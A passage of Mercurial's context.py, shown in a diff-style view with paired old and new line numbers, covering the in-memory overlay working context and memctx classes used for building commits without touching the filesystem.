1735 for p in reversed(list(util.finddirs(f))):
1734 if wvfs.isfileorlink(p):
1736 if wvfs.isfileorlink(p):
1735 wvfs.unlink(p)
1737 wvfs.unlink(p)
1736 break
1738 break
1737
1739
1738 def setflags(self, l, x):
1740 def setflags(self, l, x):
1739 self._repo.wvfs.setflags(self._path, l, x)
1741 self._repo.wvfs.setflags(self._path, l, x)
1740
1742
1741 class overlayworkingctx(committablectx):
1743 class overlayworkingctx(committablectx):
1742 """Wraps another mutable context with a write-back cache that can be
1744 """Wraps another mutable context with a write-back cache that can be
1743 converted into a commit context.
1745 converted into a commit context.
1744
1746
1745 self._cache[path] maps to a dict with keys: {
1747 self._cache[path] maps to a dict with keys: {
1746 'exists': bool?
1748 'exists': bool?
1747 'date': date?
1749 'date': date?
1748 'data': str?
1750 'data': str?
1749 'flags': str?
1751 'flags': str?
1750 'copied': str? (path or None)
1752 'copied': str? (path or None)
1751 }
1753 }
1752 If `exists` is True, `flags` must be non-None and 'date' is non-None. If it
1754 If `exists` is True, `flags` must be non-None and 'date' is non-None. If it
1753 is `False`, the file was deleted.
1755 is `False`, the file was deleted.
1754 """
1756 """
1755
1757
1756 def __init__(self, repo):
1758 def __init__(self, repo):
1757 super(overlayworkingctx, self).__init__(repo)
1759 super(overlayworkingctx, self).__init__(repo)
1758 self.clean()
1760 self.clean()
1759
1761
1760 def setbase(self, wrappedctx):
1762 def setbase(self, wrappedctx):
1761 self._wrappedctx = wrappedctx
1763 self._wrappedctx = wrappedctx
1762 self._parents = [wrappedctx]
1764 self._parents = [wrappedctx]
1763 # Drop old manifest cache as it is now out of date.
1765 # Drop old manifest cache as it is now out of date.
1764 # This is necessary when, e.g., rebasing several nodes with one
1766 # This is necessary when, e.g., rebasing several nodes with one
1765 # ``overlayworkingctx`` (e.g. with --collapse).
1767 # ``overlayworkingctx`` (e.g. with --collapse).
1766 util.clearcachedproperty(self, '_manifest')
1768 util.clearcachedproperty(self, '_manifest')
1767
1769
1768 def data(self, path):
1770 def data(self, path):
1769 if self.isdirty(path):
1771 if self.isdirty(path):
1770 if self._cache[path]['exists']:
1772 if self._cache[path]['exists']:
1771 if self._cache[path]['data']:
1773 if self._cache[path]['data']:
1772 return self._cache[path]['data']
1774 return self._cache[path]['data']
1773 else:
1775 else:
1774 # Must fallback here, too, because we only set flags.
1776 # Must fallback here, too, because we only set flags.
1775 return self._wrappedctx[path].data()
1777 return self._wrappedctx[path].data()
1776 else:
1778 else:
1777 raise error.ProgrammingError("No such file or directory: %s" %
1779 raise error.ProgrammingError("No such file or directory: %s" %
1778 path)
1780 path)
1779 else:
1781 else:
1780 return self._wrappedctx[path].data()
1782 return self._wrappedctx[path].data()
1781
1783
1782 @propertycache
1784 @propertycache
1783 def _manifest(self):
1785 def _manifest(self):
1784 parents = self.parents()
1786 parents = self.parents()
1785 man = parents[0].manifest().copy()
1787 man = parents[0].manifest().copy()
1786
1788
1787 flag = self._flagfunc
1789 flag = self._flagfunc
1788 for path in self.added():
1790 for path in self.added():
1789 man[path] = addednodeid
1791 man[path] = addednodeid
1790 man.setflag(path, flag(path))
1792 man.setflag(path, flag(path))
1791 for path in self.modified():
1793 for path in self.modified():
1792 man[path] = modifiednodeid
1794 man[path] = modifiednodeid
1793 man.setflag(path, flag(path))
1795 man.setflag(path, flag(path))
1794 for path in self.removed():
1796 for path in self.removed():
1795 del man[path]
1797 del man[path]
1796 return man
1798 return man
1797
1799
1798 @propertycache
1800 @propertycache
1799 def _flagfunc(self):
1801 def _flagfunc(self):
1800 def f(path):
1802 def f(path):
1801 return self._cache[path]['flags']
1803 return self._cache[path]['flags']
1802 return f
1804 return f
1803
1805
1804 def files(self):
1806 def files(self):
1805 return sorted(self.added() + self.modified() + self.removed())
1807 return sorted(self.added() + self.modified() + self.removed())
1806
1808
1807 def modified(self):
1809 def modified(self):
1808 return [f for f in self._cache.keys() if self._cache[f]['exists'] and
1810 return [f for f in self._cache.keys() if self._cache[f]['exists'] and
1809 self._existsinparent(f)]
1811 self._existsinparent(f)]
1810
1812
1811 def added(self):
1813 def added(self):
1812 return [f for f in self._cache.keys() if self._cache[f]['exists'] and
1814 return [f for f in self._cache.keys() if self._cache[f]['exists'] and
1813 not self._existsinparent(f)]
1815 not self._existsinparent(f)]
1814
1816
1815 def removed(self):
1817 def removed(self):
1816 return [f for f in self._cache.keys() if
1818 return [f for f in self._cache.keys() if
1817 not self._cache[f]['exists'] and self._existsinparent(f)]
1819 not self._cache[f]['exists'] and self._existsinparent(f)]
1818
1820
1819 def isinmemory(self):
1821 def isinmemory(self):
1820 return True
1822 return True
1821
1823
1822 def filedate(self, path):
1824 def filedate(self, path):
1823 if self.isdirty(path):
1825 if self.isdirty(path):
1824 return self._cache[path]['date']
1826 return self._cache[path]['date']
1825 else:
1827 else:
1826 return self._wrappedctx[path].date()
1828 return self._wrappedctx[path].date()
1827
1829
1828 def markcopied(self, path, origin):
1830 def markcopied(self, path, origin):
1829 if self.isdirty(path):
1831 if self.isdirty(path):
1830 self._cache[path]['copied'] = origin
1832 self._cache[path]['copied'] = origin
1831 else:
1833 else:
1832 raise error.ProgrammingError('markcopied() called on clean context')
1834 raise error.ProgrammingError('markcopied() called on clean context')
1833
1835
1834 def copydata(self, path):
1836 def copydata(self, path):
1835 if self.isdirty(path):
1837 if self.isdirty(path):
1836 return self._cache[path]['copied']
1838 return self._cache[path]['copied']
1837 else:
1839 else:
1838 raise error.ProgrammingError('copydata() called on clean context')
1840 raise error.ProgrammingError('copydata() called on clean context')
1839
1841
1840 def flags(self, path):
1842 def flags(self, path):
1841 if self.isdirty(path):
1843 if self.isdirty(path):
1842 if self._cache[path]['exists']:
1844 if self._cache[path]['exists']:
1843 return self._cache[path]['flags']
1845 return self._cache[path]['flags']
1844 else:
1846 else:
1845 raise error.ProgrammingError("No such file or directory: %s" %
1847 raise error.ProgrammingError("No such file or directory: %s" %
1846 self._path)
1848 self._path)
1847 else:
1849 else:
1848 return self._wrappedctx[path].flags()
1850 return self._wrappedctx[path].flags()
1849
1851
1850 def _existsinparent(self, path):
1852 def _existsinparent(self, path):
1851 try:
1853 try:
1852 # ``commitctx` raises a ``ManifestLookupError`` if a path does not
1854 # ``commitctx` raises a ``ManifestLookupError`` if a path does not
1853 # exist, unlike ``workingctx``, which returns a ``workingfilectx``
1855 # exist, unlike ``workingctx``, which returns a ``workingfilectx``
1854 # with an ``exists()`` function.
1856 # with an ``exists()`` function.
1855 self._wrappedctx[path]
1857 self._wrappedctx[path]
1856 return True
1858 return True
1857 except error.ManifestLookupError:
1859 except error.ManifestLookupError:
1858 return False
1860 return False
1859
1861
1860 def _auditconflicts(self, path):
1862 def _auditconflicts(self, path):
1861 """Replicates conflict checks done by wvfs.write().
1863 """Replicates conflict checks done by wvfs.write().
1862
1864
1863 Since we never write to the filesystem and never call `applyupdates` in
1865 Since we never write to the filesystem and never call `applyupdates` in
1864 IMM, we'll never check that a path is actually writable -- e.g., because
1866 IMM, we'll never check that a path is actually writable -- e.g., because
1865 it adds `a/foo`, but `a` is actually a file in the other commit.
1867 it adds `a/foo`, but `a` is actually a file in the other commit.
1866 """
1868 """
1867 def fail(path, component):
1869 def fail(path, component):
1868 # p1() is the base and we're receiving "writes" for p2()'s
1870 # p1() is the base and we're receiving "writes" for p2()'s
1869 # files.
1871 # files.
1870 if 'l' in self.p1()[component].flags():
1872 if 'l' in self.p1()[component].flags():
1871 raise error.Abort("error: %s conflicts with symlink %s "
1873 raise error.Abort("error: %s conflicts with symlink %s "
1872 "in %s." % (path, component,
1874 "in %s." % (path, component,
1873 self.p1().rev()))
1875 self.p1().rev()))
1874 else:
1876 else:
1875 raise error.Abort("error: '%s' conflicts with file '%s' in "
1877 raise error.Abort("error: '%s' conflicts with file '%s' in "
1876 "%s." % (path, component,
1878 "%s." % (path, component,
1877 self.p1().rev()))
1879 self.p1().rev()))
1878
1880
1879 # Test that each new directory to be created to write this path from p2
1881 # Test that each new directory to be created to write this path from p2
1880 # is not a file in p1.
1882 # is not a file in p1.
1881 components = path.split('/')
1883 components = path.split('/')
1882 for i in xrange(len(components)):
1884 for i in xrange(len(components)):
1883 component = "/".join(components[0:i])
1885 component = "/".join(components[0:i])
1884 if component in self.p1():
1886 if component in self.p1():
1885 fail(path, component)
1887 fail(path, component)
1886
1888
1887 # Test the other direction -- that this path from p2 isn't a directory
1889 # Test the other direction -- that this path from p2 isn't a directory
1888 # in p1 (test that p1 doesn't any paths matching `path/*`).
1890 # in p1 (test that p1 doesn't any paths matching `path/*`).
1889 match = matchmod.match('/', '', [path + '/'], default=b'relpath')
1891 match = matchmod.match('/', '', [path + '/'], default=b'relpath')
1890 matches = self.p1().manifest().matches(match)
1892 matches = self.p1().manifest().matches(match)
1891 if len(matches) > 0:
1893 if len(matches) > 0:
1892 if len(matches) == 1 and matches.keys()[0] == path:
1894 if len(matches) == 1 and matches.keys()[0] == path:
1893 return
1895 return
1894 raise error.Abort("error: file '%s' cannot be written because "
1896 raise error.Abort("error: file '%s' cannot be written because "
1895 " '%s/' is a folder in %s (containing %d "
1897 " '%s/' is a folder in %s (containing %d "
1896 "entries: %s)"
1898 "entries: %s)"
1897 % (path, path, self.p1(), len(matches),
1899 % (path, path, self.p1(), len(matches),
1898 ', '.join(matches.keys())))
1900 ', '.join(matches.keys())))
1899
1901
1900 def write(self, path, data, flags='', **kwargs):
1902 def write(self, path, data, flags='', **kwargs):
1901 if data is None:
1903 if data is None:
1902 raise error.ProgrammingError("data must be non-None")
1904 raise error.ProgrammingError("data must be non-None")
1903 self._auditconflicts(path)
1905 self._auditconflicts(path)
1904 self._markdirty(path, exists=True, data=data, date=dateutil.makedate(),
1906 self._markdirty(path, exists=True, data=data, date=dateutil.makedate(),
1905 flags=flags)
1907 flags=flags)
1906
1908
1907 def setflags(self, path, l, x):
1909 def setflags(self, path, l, x):
1908 self._markdirty(path, exists=True, date=dateutil.makedate(),
1910 self._markdirty(path, exists=True, date=dateutil.makedate(),
1909 flags=(l and 'l' or '') + (x and 'x' or ''))
1911 flags=(l and 'l' or '') + (x and 'x' or ''))
1910
1912
1911 def remove(self, path):
1913 def remove(self, path):
1912 self._markdirty(path, exists=False)
1914 self._markdirty(path, exists=False)
1913
1915
1914 def exists(self, path):
1916 def exists(self, path):
1915 """exists behaves like `lexists`, but needs to follow symlinks and
1917 """exists behaves like `lexists`, but needs to follow symlinks and
1916 return False if they are broken.
1918 return False if they are broken.
1917 """
1919 """
1918 if self.isdirty(path):
1920 if self.isdirty(path):
1919 # If this path exists and is a symlink, "follow" it by calling
1921 # If this path exists and is a symlink, "follow" it by calling
1920 # exists on the destination path.
1922 # exists on the destination path.
1921 if (self._cache[path]['exists'] and
1923 if (self._cache[path]['exists'] and
1922 'l' in self._cache[path]['flags']):
1924 'l' in self._cache[path]['flags']):
1923 return self.exists(self._cache[path]['data'].strip())
1925 return self.exists(self._cache[path]['data'].strip())
1924 else:
1926 else:
1925 return self._cache[path]['exists']
1927 return self._cache[path]['exists']
1926
1928
1927 return self._existsinparent(path)
1929 return self._existsinparent(path)
1928
1930
1929 def lexists(self, path):
1931 def lexists(self, path):
1930 """lexists returns True if the path exists"""
1932 """lexists returns True if the path exists"""
1931 if self.isdirty(path):
1933 if self.isdirty(path):
1932 return self._cache[path]['exists']
1934 return self._cache[path]['exists']
1933
1935
1934 return self._existsinparent(path)
1936 return self._existsinparent(path)
1935
1937
1936 def size(self, path):
1938 def size(self, path):
1937 if self.isdirty(path):
1939 if self.isdirty(path):
1938 if self._cache[path]['exists']:
1940 if self._cache[path]['exists']:
1939 return len(self._cache[path]['data'])
1941 return len(self._cache[path]['data'])
1940 else:
1942 else:
1941 raise error.ProgrammingError("No such file or directory: %s" %
1943 raise error.ProgrammingError("No such file or directory: %s" %
1942 self._path)
1944 self._path)
1943 return self._wrappedctx[path].size()
1945 return self._wrappedctx[path].size()
1944
1946
1945 def tomemctx(self, text, branch=None, extra=None, date=None, parents=None,
1947 def tomemctx(self, text, branch=None, extra=None, date=None, parents=None,
1946 user=None, editor=None):
1948 user=None, editor=None):
1947 """Converts this ``overlayworkingctx`` into a ``memctx`` ready to be
1949 """Converts this ``overlayworkingctx`` into a ``memctx`` ready to be
1948 committed.
1950 committed.
1949
1951
1950 ``text`` is the commit message.
1952 ``text`` is the commit message.
1951 ``parents`` (optional) are rev numbers.
1953 ``parents`` (optional) are rev numbers.
1952 """
1954 """
1953 # Default parents to the wrapped contexts' if not passed.
1955 # Default parents to the wrapped contexts' if not passed.
1954 if parents is None:
1956 if parents is None:
1955 parents = self._wrappedctx.parents()
1957 parents = self._wrappedctx.parents()
1956 if len(parents) == 1:
1958 if len(parents) == 1:
1957 parents = (parents[0], None)
1959 parents = (parents[0], None)
1958
1960
1959 # ``parents`` is passed as rev numbers; convert to ``commitctxs``.
1961 # ``parents`` is passed as rev numbers; convert to ``commitctxs``.
1960 if parents[1] is None:
1962 if parents[1] is None:
1961 parents = (self._repo[parents[0]], None)
1963 parents = (self._repo[parents[0]], None)
1962 else:
1964 else:
1963 parents = (self._repo[parents[0]], self._repo[parents[1]])
1965 parents = (self._repo[parents[0]], self._repo[parents[1]])
1964
1966
1965 files = self._cache.keys()
1967 files = self._cache.keys()
1966 def getfile(repo, memctx, path):
1968 def getfile(repo, memctx, path):
1967 if self._cache[path]['exists']:
1969 if self._cache[path]['exists']:
1968 return memfilectx(repo, memctx, path,
1970 return memfilectx(repo, memctx, path,
1969 self._cache[path]['data'],
1971 self._cache[path]['data'],
1970 'l' in self._cache[path]['flags'],
1972 'l' in self._cache[path]['flags'],
1971 'x' in self._cache[path]['flags'],
1973 'x' in self._cache[path]['flags'],
1972 self._cache[path]['copied'])
1974 self._cache[path]['copied'])
1973 else:
1975 else:
1974 # Returning None, but including the path in `files`, is
1976 # Returning None, but including the path in `files`, is
1975 # necessary for memctx to register a deletion.
1977 # necessary for memctx to register a deletion.
1976 return None
1978 return None
1977 return memctx(self._repo, parents, text, files, getfile, date=date,
1979 return memctx(self._repo, parents, text, files, getfile, date=date,
1978 extra=extra, user=user, branch=branch, editor=editor)
1980 extra=extra, user=user, branch=branch, editor=editor)
1979
1981
1980 def isdirty(self, path):
1982 def isdirty(self, path):
1981 return path in self._cache
1983 return path in self._cache
1982
1984
1983 def isempty(self):
1985 def isempty(self):
1984 # We need to discard any keys that are actually clean before the empty
1986 # We need to discard any keys that are actually clean before the empty
1985 # commit check.
1987 # commit check.
1986 self._compact()
1988 self._compact()
1987 return len(self._cache) == 0
1989 return len(self._cache) == 0
1988
1990
1989 def clean(self):
1991 def clean(self):
1990 self._cache = {}
1992 self._cache = {}
1991
1993
1992 def _compact(self):
1994 def _compact(self):
1993 """Removes keys from the cache that are actually clean, by comparing
1995 """Removes keys from the cache that are actually clean, by comparing
1994 them with the underlying context.
1996 them with the underlying context.
1995
1997
1996 This can occur during the merge process, e.g. by passing --tool :local
1998 This can occur during the merge process, e.g. by passing --tool :local
1997 to resolve a conflict.
1999 to resolve a conflict.
1998 """
2000 """
1999 keys = []
2001 keys = []
2000 for path in self._cache.keys():
2002 for path in self._cache.keys():
2001 cache = self._cache[path]
2003 cache = self._cache[path]
2002 try:
2004 try:
2003 underlying = self._wrappedctx[path]
2005 underlying = self._wrappedctx[path]
2004 if (underlying.data() == cache['data'] and
2006 if (underlying.data() == cache['data'] and
2005 underlying.flags() == cache['flags']):
2007 underlying.flags() == cache['flags']):
2006 keys.append(path)
2008 keys.append(path)
2007 except error.ManifestLookupError:
2009 except error.ManifestLookupError:
2008 # Path not in the underlying manifest (created).
2010 # Path not in the underlying manifest (created).
2009 continue
2011 continue
2010
2012
2011 for path in keys:
2013 for path in keys:
2012 del self._cache[path]
2014 del self._cache[path]
2013 return keys
2015 return keys
2014
2016
2015 def _markdirty(self, path, exists, data=None, date=None, flags=''):
2017 def _markdirty(self, path, exists, data=None, date=None, flags=''):
2016 self._cache[path] = {
2018 self._cache[path] = {
2017 'exists': exists,
2019 'exists': exists,
2018 'data': data,
2020 'data': data,
2019 'date': date,
2021 'date': date,
2020 'flags': flags,
2022 'flags': flags,
2021 'copied': None,
2023 'copied': None,
2022 }
2024 }
2023
2025
2024 def filectx(self, path, filelog=None):
2026 def filectx(self, path, filelog=None):
2025 return overlayworkingfilectx(self._repo, path, parent=self,
2027 return overlayworkingfilectx(self._repo, path, parent=self,
2026 filelog=filelog)
2028 filelog=filelog)
2027
2029
2028 class overlayworkingfilectx(committablefilectx):
2030 class overlayworkingfilectx(committablefilectx):
2029 """Wrap a ``workingfilectx`` but intercepts all writes into an in-memory
2031 """Wrap a ``workingfilectx`` but intercepts all writes into an in-memory
2030 cache, which can be flushed through later by calling ``flush()``."""
2032 cache, which can be flushed through later by calling ``flush()``."""
2031
2033
2032 def __init__(self, repo, path, filelog=None, parent=None):
2034 def __init__(self, repo, path, filelog=None, parent=None):
2033 super(overlayworkingfilectx, self).__init__(repo, path, filelog,
2035 super(overlayworkingfilectx, self).__init__(repo, path, filelog,
2034 parent)
2036 parent)
2035 self._repo = repo
2037 self._repo = repo
2036 self._parent = parent
2038 self._parent = parent
2037 self._path = path
2039 self._path = path
2038
2040
2039 def cmp(self, fctx):
2041 def cmp(self, fctx):
2040 return self.data() != fctx.data()
2042 return self.data() != fctx.data()
2041
2043
2042 def changectx(self):
2044 def changectx(self):
2043 return self._parent
2045 return self._parent
2044
2046
2045 def data(self):
2047 def data(self):
2046 return self._parent.data(self._path)
2048 return self._parent.data(self._path)
2047
2049
2048 def date(self):
2050 def date(self):
2049 return self._parent.filedate(self._path)
2051 return self._parent.filedate(self._path)
2050
2052
2051 def exists(self):
2053 def exists(self):
2052 return self.lexists()
2054 return self.lexists()
2053
2055
2054 def lexists(self):
2056 def lexists(self):
2055 return self._parent.exists(self._path)
2057 return self._parent.exists(self._path)
2056
2058
2057 def renamed(self):
2059 def renamed(self):
2058 path = self._parent.copydata(self._path)
2060 path = self._parent.copydata(self._path)
2059 if not path:
2061 if not path:
2060 return None
2062 return None
2061 return path, self._changectx._parents[0]._manifest.get(path, nullid)
2063 return path, self._changectx._parents[0]._manifest.get(path, nullid)
2062
2064
2063 def size(self):
2065 def size(self):
2064 return self._parent.size(self._path)
2066 return self._parent.size(self._path)
2065
2067
2066 def markcopied(self, origin):
2068 def markcopied(self, origin):
2067 self._parent.markcopied(self._path, origin)
2069 self._parent.markcopied(self._path, origin)
2068
2070
2069 def audit(self):
2071 def audit(self):
2070 pass
2072 pass
2071
2073
2072 def flags(self):
2074 def flags(self):
2073 return self._parent.flags(self._path)
2075 return self._parent.flags(self._path)
2074
2076
2075 def setflags(self, islink, isexec):
2077 def setflags(self, islink, isexec):
2076 return self._parent.setflags(self._path, islink, isexec)
2078 return self._parent.setflags(self._path, islink, isexec)
2077
2079
2078 def write(self, data, flags, backgroundclose=False, **kwargs):
2080 def write(self, data, flags, backgroundclose=False, **kwargs):
2079 return self._parent.write(self._path, data, flags, **kwargs)
2081 return self._parent.write(self._path, data, flags, **kwargs)
2080
2082
2081 def remove(self, ignoremissing=False):
2083 def remove(self, ignoremissing=False):
2082 return self._parent.remove(self._path)
2084 return self._parent.remove(self._path)
2083
2085
2084 def clearunknown(self):
2086 def clearunknown(self):
2085 pass
2087 pass
2086
2088
2087 class workingcommitctx(workingctx):
2089 class workingcommitctx(workingctx):
2088 """A workingcommitctx object makes access to data related to
2090 """A workingcommitctx object makes access to data related to
2089 the revision being committed convenient.
2091 the revision being committed convenient.
2090
2092
2091 This hides changes in the working directory, if they aren't
2093 This hides changes in the working directory, if they aren't
2092 committed in this context.
2094 committed in this context.
2093 """
2095 """
2094 def __init__(self, repo, changes,
2096 def __init__(self, repo, changes,
2095 text="", user=None, date=None, extra=None):
2097 text="", user=None, date=None, extra=None):
2096 super(workingctx, self).__init__(repo, text, user, date, extra,
2098 super(workingctx, self).__init__(repo, text, user, date, extra,
2097 changes)
2099 changes)
2098
2100
2099 def _dirstatestatus(self, match, ignored=False, clean=False, unknown=False):
2101 def _dirstatestatus(self, match, ignored=False, clean=False, unknown=False):
2100 """Return matched files only in ``self._status``
2102 """Return matched files only in ``self._status``
2101
2103
2102 Uncommitted files appear "clean" via this context, even if
2104 Uncommitted files appear "clean" via this context, even if
2103 they aren't actually so in the working directory.
2105 they aren't actually so in the working directory.
2104 """
2106 """
2105 if clean:
2107 if clean:
2106 clean = [f for f in self._manifest if f not in self._changedset]
2108 clean = [f for f in self._manifest if f not in self._changedset]
2107 else:
2109 else:
2108 clean = []
2110 clean = []
2109 return scmutil.status([f for f in self._status.modified if match(f)],
2111 return scmutil.status([f for f in self._status.modified if match(f)],
2110 [f for f in self._status.added if match(f)],
2112 [f for f in self._status.added if match(f)],
2111 [f for f in self._status.removed if match(f)],
2113 [f for f in self._status.removed if match(f)],
2112 [], [], [], clean)
2114 [], [], [], clean)
2113
2115
2114 @propertycache
2116 @propertycache
2115 def _changedset(self):
2117 def _changedset(self):
2116 """Return the set of files changed in this context
2118 """Return the set of files changed in this context
2117 """
2119 """
2118 changed = set(self._status.modified)
2120 changed = set(self._status.modified)
2119 changed.update(self._status.added)
2121 changed.update(self._status.added)
2120 changed.update(self._status.removed)
2122 changed.update(self._status.removed)
2121 return changed
2123 return changed
2122
2124
2123 def makecachingfilectxfn(func):
2125 def makecachingfilectxfn(func):
2124 """Create a filectxfn that caches based on the path.
2126 """Create a filectxfn that caches based on the path.
2125
2127
2126 We can't use util.cachefunc because it uses all arguments as the cache
2128 We can't use util.cachefunc because it uses all arguments as the cache
2127 key and this creates a cycle since the arguments include the repo and
2129 key and this creates a cycle since the arguments include the repo and
2128 memctx.
2130 memctx.
2129 """
2131 """
2130 cache = {}
2132 cache = {}
2131
2133
2132 def getfilectx(repo, memctx, path):
2134 def getfilectx(repo, memctx, path):
2133 if path not in cache:
2135 if path not in cache:
2134 cache[path] = func(repo, memctx, path)
2136 cache[path] = func(repo, memctx, path)
2135 return cache[path]
2137 return cache[path]
2136
2138
2137 return getfilectx
2139 return getfilectx
2138
2140
2139 def memfilefromctx(ctx):
2141 def memfilefromctx(ctx):
2140 """Given a context return a memfilectx for ctx[path]
2142 """Given a context return a memfilectx for ctx[path]
2141
2143
2142 This is a convenience method for building a memctx based on another
2144 This is a convenience method for building a memctx based on another
2143 context.
2145 context.
2144 """
2146 """
2145 def getfilectx(repo, memctx, path):
2147 def getfilectx(repo, memctx, path):
2146 fctx = ctx[path]
2148 fctx = ctx[path]
2147 # this is weird but apparently we only keep track of one parent
2149 # this is weird but apparently we only keep track of one parent
2148 # (why not only store that instead of a tuple?)
2150 # (why not only store that instead of a tuple?)
2149 copied = fctx.renamed()
2151 copied = fctx.renamed()
2150 if copied:
2152 if copied:
2151 copied = copied[0]
2153 copied = copied[0]
2152 return memfilectx(repo, memctx, path, fctx.data(),
2154 return memfilectx(repo, memctx, path, fctx.data(),
2153 islink=fctx.islink(), isexec=fctx.isexec(),
2155 islink=fctx.islink(), isexec=fctx.isexec(),
2154 copied=copied)
2156 copied=copied)
2155
2157
2156 return getfilectx
2158 return getfilectx
2157
2159
2158 def memfilefrompatch(patchstore):
2160 def memfilefrompatch(patchstore):
2159 """Given a patch (e.g. patchstore object) return a memfilectx
2161 """Given a patch (e.g. patchstore object) return a memfilectx
2160
2162
2161 This is a convenience method for building a memctx based on a patchstore.
2163 This is a convenience method for building a memctx based on a patchstore.
2162 """
2164 """
2163 def getfilectx(repo, memctx, path):
2165 def getfilectx(repo, memctx, path):
2164 data, mode, copied = patchstore.getfile(path)
2166 data, mode, copied = patchstore.getfile(path)
2165 if data is None:
2167 if data is None:
2166 return None
2168 return None
2167 islink, isexec = mode
2169 islink, isexec = mode
2168 return memfilectx(repo, memctx, path, data, islink=islink,
2170 return memfilectx(repo, memctx, path, data, islink=islink,
2169 isexec=isexec, copied=copied)
2171 isexec=isexec, copied=copied)
2170
2172
2171 return getfilectx
2173 return getfilectx
2172
2174
2173 class memctx(committablectx):
2175 class memctx(committablectx):
2174 """Use memctx to perform in-memory commits via localrepo.commitctx().
2176 """Use memctx to perform in-memory commits via localrepo.commitctx().
2175
2177
2176 Revision information is supplied at initialization time while
2178 Revision information is supplied at initialization time while
2177 related files data and is made available through a callback
2179 related files data and is made available through a callback
2178 mechanism. 'repo' is the current localrepo, 'parents' is a
2180 mechanism. 'repo' is the current localrepo, 'parents' is a
2179 sequence of two parent revisions identifiers (pass None for every
2181 sequence of two parent revisions identifiers (pass None for every
2180 missing parent), 'text' is the commit message and 'files' lists
2182 missing parent), 'text' is the commit message and 'files' lists
2181 names of files touched by the revision (normalized and relative to
2183 names of files touched by the revision (normalized and relative to
2182 repository root).
2184 repository root).
2183
2185
2184 filectxfn(repo, memctx, path) is a callable receiving the
2186 filectxfn(repo, memctx, path) is a callable receiving the
2185 repository, the current memctx object and the normalized path of
2187 repository, the current memctx object and the normalized path of
2186 requested file, relative to repository root. It is fired by the
2188 requested file, relative to repository root. It is fired by the
2187 commit function for every file in 'files', but calls order is
2189 commit function for every file in 'files', but calls order is
2188 undefined. If the file is available in the revision being
2190 undefined. If the file is available in the revision being
2189 committed (updated or added), filectxfn returns a memfilectx
2191 committed (updated or added), filectxfn returns a memfilectx
2190 object. If the file was removed, filectxfn return None for recent
2192 object. If the file was removed, filectxfn return None for recent
2191 Mercurial. Moved files are represented by marking the source file
2193 Mercurial. Moved files are represented by marking the source file
2192 removed and the new file added with copy information (see
2194 removed and the new file added with copy information (see
2193 memfilectx).
2195 memfilectx).
2194
2196
2195 user receives the committer name and defaults to current
2197 user receives the committer name and defaults to current
2196 repository username, date is the commit date in any format
2198 repository username, date is the commit date in any format
2197 supported by dateutil.parsedate() and defaults to current date, extra
2199 supported by dateutil.parsedate() and defaults to current date, extra
2198 is a dictionary of metadata or is left empty.
2200 is a dictionary of metadata or is left empty.
2199 """
2201 """
2200
2202
2201 # Mercurial <= 3.1 expects the filectxfn to raise IOError for missing files.
2203 # Mercurial <= 3.1 expects the filectxfn to raise IOError for missing files.
2202 # Extensions that need to retain compatibility across Mercurial 3.1 can use
2204 # Extensions that need to retain compatibility across Mercurial 3.1 can use
2203 # this field to determine what to do in filectxfn.
2205 # this field to determine what to do in filectxfn.
2204 _returnnoneformissingfiles = True
2206 _returnnoneformissingfiles = True
2205
2207
2206 def __init__(self, repo, parents, text, files, filectxfn, user=None,
2208 def __init__(self, repo, parents, text, files, filectxfn, user=None,
2207 date=None, extra=None, branch=None, editor=False):
2209 date=None, extra=None, branch=None, editor=False):
2208 super(memctx, self).__init__(repo, text, user, date, extra)
2210 super(memctx, self).__init__(repo, text, user, date, extra)
2209 self._rev = None
2211 self._rev = None
2210 self._node = None
2212 self._node = None
2211 parents = [(p or nullid) for p in parents]
2213 parents = [(p or nullid) for p in parents]
2212 p1, p2 = parents
2214 p1, p2 = parents
2213 self._parents = [self._repo[p] for p in (p1, p2)]
2215 self._parents = [self._repo[p] for p in (p1, p2)]
2214 files = sorted(set(files))
2216 files = sorted(set(files))
2215 self._files = files
2217 self._files = files
2216 if branch is not None:
2218 if branch is not None:
2217 self._extra['branch'] = encoding.fromlocal(branch)
2219 self._extra['branch'] = encoding.fromlocal(branch)
2218 self.substate = {}
2220 self.substate = {}
2219
2221
2220 if isinstance(filectxfn, patch.filestore):
2222 if isinstance(filectxfn, patch.filestore):
2221 filectxfn = memfilefrompatch(filectxfn)
2223 filectxfn = memfilefrompatch(filectxfn)
2222 elif not callable(filectxfn):
2224 elif not callable(filectxfn):
2223 # if store is not callable, wrap it in a function
2225 # if store is not callable, wrap it in a function
2224 filectxfn = memfilefromctx(filectxfn)
2226 filectxfn = memfilefromctx(filectxfn)
2225
2227
2226 # memoizing increases performance for e.g. vcs convert scenarios.
2228 # memoizing increases performance for e.g. vcs convert scenarios.
2227 self._filectxfn = makecachingfilectxfn(filectxfn)
2229 self._filectxfn = makecachingfilectxfn(filectxfn)
2228
2230
2229 if editor:
2231 if editor:
2230 self._text = editor(self._repo, self, [])
2232 self._text = editor(self._repo, self, [])
2231 self._repo.savecommitmessage(self._text)
2233 self._repo.savecommitmessage(self._text)
2232
2234
2233 def filectx(self, path, filelog=None):
2235 def filectx(self, path, filelog=None):
2234 """get a file context from the working directory
2236 """get a file context from the working directory
2235
2237
2236 Returns None if file doesn't exist and should be removed."""
2238 Returns None if file doesn't exist and should be removed."""
2237 return self._filectxfn(self._repo, self, path)
2239 return self._filectxfn(self._repo, self, path)
2238
2240
2239 def commit(self):
2241 def commit(self):
2240 """commit context to the repo"""
2242 """commit context to the repo"""
2241 return self._repo.commitctx(self)
2243 return self._repo.commitctx(self)
2242
2244
2243 @propertycache
2245 @propertycache
2244 def _manifest(self):
2246 def _manifest(self):
2245 """generate a manifest based on the return values of filectxfn"""
2247 """generate a manifest based on the return values of filectxfn"""
2246
2248
2247 # keep this simple for now; just worry about p1
2249 # keep this simple for now; just worry about p1
2248 pctx = self._parents[0]
2250 pctx = self._parents[0]
2249 man = pctx.manifest().copy()
2251 man = pctx.manifest().copy()
2250
2252
2251 for f in self._status.modified:
2253 for f in self._status.modified:
2252 p1node = nullid
2254 p1node = nullid
2253 p2node = nullid
2255 p2node = nullid
2254 p = pctx[f].parents() # if file isn't in pctx, check p2?
2256 p = pctx[f].parents() # if file isn't in pctx, check p2?
2255 if len(p) > 0:
2257 if len(p) > 0:
2256 p1node = p[0].filenode()
2258 p1node = p[0].filenode()
2257 if len(p) > 1:
2259 if len(p) > 1:
2258 p2node = p[1].filenode()
2260 p2node = p[1].filenode()
2259 man[f] = revlog.hash(self[f].data(), p1node, p2node)
2261 man[f] = revlog.hash(self[f].data(), p1node, p2node)
2260
2262
2261 for f in self._status.added:
2263 for f in self._status.added:
